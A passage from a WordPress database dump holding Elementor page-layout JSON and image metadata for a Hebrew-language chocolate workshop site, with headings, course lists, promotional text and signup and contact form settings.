\\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26},\"typography_font_weight\":\"normal\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_text_color\":\"#40272c\",\"background_color\":\"#edd0a8\",\"border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"50\",\"bottom\":\"20\",\"left\":\"50\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"15\"},\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#5c0011\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A6%D7%A8%D7%95-%D7%A7%D7%A9%D7%A8\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"43f8ef8f\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"39181ab4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"10694622\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5212b57b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2b9dc682\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"50c468d5\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"45bcecca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"37f8a4fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"285e10d7\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"24484b98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"33814887\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"48098d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f32a997\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"\\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4?\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(376,92,'_elementor_version','0.4'),(378,93,'_edit_last','1'),(379,93,'_edit_lock','1596644540:1'),(380,93,'_wp_page_template','elementor_header_footer'),(381,94,'_menu_item_type','post_type'),(382,94,'_menu_item_menu_item_parent','379'),(383,94,'_menu_item_object_id','93'),(384,94,'_menu_item_object','page'),(385,94,'_menu_item_target',''),(386,94,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(387,94,'_menu_item_xfn',''),(388,94,'_menu_item_url',''),(389,93,'_elementor_edit_mode','builder'),(392,93,'_elementor_template_type','wp-post'),(395,97,'_wp_attached_file','2018/05/bach-choco.jpg'),(396,97,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:630;s:4:\"file\";s:22:\"2018/05/bach-choco.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"bach-choco-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"bach-choco-300x158.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:158;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"bach-choco-768x403.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:403;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"bach-choco-1024x538.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:538;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:22:\"bach-choco-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(397,93,'_elementor_data','[{\"id\":\"e598d46\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"5064e7e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a3f5421\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"32629eb6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"3303ec95\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"72cc0b19\",\"elType\":\"widget\",\"settings\":{\"slides\":[{\"heading\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"description\":\"\",\"button_text\":\"\",\"background_color\":\"#833ca3\",\"_id\":\"c001fa3\",\"background_image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_292134302_s-2019-1.jpg\",\"id\":516},\"background_size\":\"cover\",\"background_ken_burns\":\"\",\"zoom_direction\":\"in\",\"background_overlay\":\"yes\",\"background_overlay_color\":\"rgba(0,0,0,0.5)\",\"background_overlay_blend_mode\":\"\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"link_click\":\"slide\",\"custom_style\":\"\",\"horizontal_position\":\"\",\"vertical_position\":\"\",\"text_align\":\"\",\"content_color\":\"\",\"repeater_text_shadow_text_shadow_type\":\"\",\"repeater_text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(0,0,0,0.3)\"}}],\"slides_height\":{\"unit\":\"px\",\"size\":286,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"slides\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"46cd5565\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7e1d7e0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"baae2e1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"color: #000000;\\\">\\u05e8\\u05d5\\u05e6\\u05d5\\u05ea \\u05dc\\u05d2\\u05e8\\u05d5\\u05dd \\u05dc\\u05db\\u05dc\\u05d4 \\\"TO BE\\\" \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05d1\\u05dc\\u05ea\\u05d9 \\u05e0\\u05e9\\u05db\\u05d7\\u05ea \\u05d5\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3? \\u05d1\\u05d0 \\u05dc\\u05db\\u05df \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05d1\\u05d0\\u05d5\\u05d5\\u05d9\\u05e8\\u05d4 \\u05de\\u05ea\\u05d5\\u05e7\\u05d4, \\u05d5\\u05dc\\u05d4\\u05d5\\u05e1\\u05d9\\u05e4 \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05e9\\u05d3\\u05e8\\u05d2 \\u05dc\\u05db\\u05df \\u05d0\\u05ea \\u05d4\\u05d0\\u05d9\\u05e8\\u05d5\\u05e2? \\u05d0\\u05d6 \\u05dc\\u05e4\\u05e0\\u05d9 \\u05e9\\u05d0\\u05ea\\u05df \\u05e8\\u05e6\\u05d5\\u05ea \\u05dc\\u05e9\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05e9\\u05ea\\u05d5\\u05ea \\u05d5\\u05dc\\u05e9\\u05ea\\u05d5\\u05ea \\u05de\\u05d4\\u05e7\\u05e9\\u05d9\\u05d5\\u05ea \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05dc\\u05d0\\u05d9\\u05e8\\u05d5\\u05e2, \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d7\\u05d5\\u05d5\\u05ea \\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d5\\u05d4\\u05e8\\u05d1\\u05d4.<\\/span><\\/p><h2><span style=\\\"color: #000000;\\\">\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d0\\u05d5\\u05d5\\u05d9\\u05e8\\u05d4 \\u05de\\u05ea\\u05d5\\u05e7\\u05d4 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u00a0<\\/span><\\/h2><p><span style=\\\"color: #000000;\\\">\\u05e8\\u05d5\\u05d1\\u05e0\\u05d5 \\u05d4\\u05d2\\u05d3\\u05d5\\u05dc \\u05de\\u05d0\\u05d5\\u05d3 \\u05d0\\u05d5\\u05d4\\u05d1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d1\\u05d9\\u05df \\u05d0\\u05dd \\u05d6\\u05d4 \\u05de\\u05e8\\u05d9\\u05e8, \\u05d7\\u05dc\\u05d1 \\u05d0\\u05d5 \\u05dc\\u05d1\\u05df, \\u05dc\\u05db\\u05dc \\u05d0\\u05d7\\u05d3 \\u05d9\\u05e9 \\u05d0\\u05ea \\u05d4\\u05d4\\u05e2\\u05d3\\u05e4\\u05d4 \\u05e9\\u05dc\\u05d5, \\u05d0\\u05d1\\u05dc \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9 \\u05d0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05e7\\u05d5\\u05d1\\u05d9\\u05d9\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e4\\u05e9\\u05d5\\u05d8\\u05d4, \\u05ea\\u05de\\u05d9\\u05d3 \\u05ea\\u05e2\\u05e9\\u05d4 \\u05dc\\u05e0\\u05d5 \\u05d8\\u05d5\\u05d1 \\u05e2\\u05dc \\u05d4\\u05dc\\u05d1. \\u05d0\\u05dd \\u05d0\\u05ea\\u05dd \\u05de\\u05d5\\u05e6\\u05d0\\u05d9\\u05dd \\u05d0\\u05ea \\u05e2\\u05e6\\u05de\\u05db\\u05dd \\u05de\\u05e1\\u05d5\\u05e7\\u05e8\\u05e0\\u05d9\\u05dd \\u05de\\u05e2\\u05d5\\u05dc\\u05dd \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05de\\u05ea\\u05e2\\u05e0\\u05d9\\u05d9\\u05e0\\u05d9\\u05dd \\u05d1\\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05d4\\u05d6\\u05d4, \\u05d0\\u05d5 \\u05e1\\u05ea\\u05dd \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05d0\\u05d9\\u05da \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05de\\u05de\\u05e0\\u05d5 \\u05de\\u05d8\\u05e2\\u05de\\u05d9\\u05dd, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d9\\u05ea\\u05d9\\u05ea \\u05d4\\u05d9\\u05d0 \\u05d4\\u05d6\\u05d3\\u05de\\u05e0\\u05d5\\u05ea \\u05e0\\u05d4\\u05d3\\u05e8\\u05ea \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05d6\\u05d0\\u05ea. \\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05df \\u05d3\\u05e8\\u05da \\u05de\\u05e6\\u05d5\\u05d9\\u05e0\\u05ea \\u05dc\\u05d1\\u05e9\\u05dc\\u05e0\\u05d9\\u05dd \\u05d5\\u05d0\\u05d5\\u05e4\\u05d9\\u05dd \\u05d7\\u05d5\\u05d1\\u05d1\\u05e0\\u05d9\\u05dd \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05e2\\u05dc \\u05e1\\u05d5\\u05d2\\u05d9 \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05dc\\u05d4\\u05ea\\u05e2\\u05e1\\u05e7 \\u05e2\\u05dd \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd, \\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8, \\u05dc\\u05d4\\u05db\\u05e0\\u05d9\\u05e1 \\u05dc\\u05ea\\u05d1\\u05e0\\u05d9\\u05d5\\u05ea, \\u05dc\\u05d9\\u05e6\\u05d5\\u05e7 \\u05e6\\u05d5\\u05e8\\u05d5\\u05ea, \\u05d5\\u05dc\\u05d9\\u05e6\\u05d5\\u05e8 \\u05de\\u05d2\\u05d5\\u05d5\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d5\\u05e9\\u05d7\\u05ea\\u05d9\\u05dd \\u05d5\\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd.\\u00a0<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"39d8f14d\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#000000\",\"background_color_b\":\"#692910\",\"padding\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"30fe33a4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5c487f1a\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e8\\u05d5\\u05e6\\u05d4 \\u05e9\\u05e4\\u05e9\\u05d5\\u05d8 \\u05e0\\u05d7\\u05d6\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d9\\u05da \\u05e2\\u05dd \\u05db\\u05dc \\u05d4\\u05e4\\u05e8\\u05d8\\u05d9\\u05dd?\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":41,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5938fe60\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"\\u05d8\\u05d5\\u05e4\\u05e1 \\u05d7\\u05d3\\u05e9\",\"form_fields\":[{\"custom_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"25\",\"_id\":\"11ed1fb\",\"required\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"recaptcha_badge\":\"bottomright\",\"css_classes\":\"\",\"field_value\":\"\"},{\"custom_id\":\"email\",\"field_type\":\"tel\",\"required\":\"true\",\"field_label\":\"\\u05d8\\u05dc\\u05e4\\u05d5\\u05df\",\"placeholder\":\"\\u05d8\\u05dc\\u05e4\\u05d5\\u05df\",\"width\":\"25\",\"_id\":\"f7dd8de\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\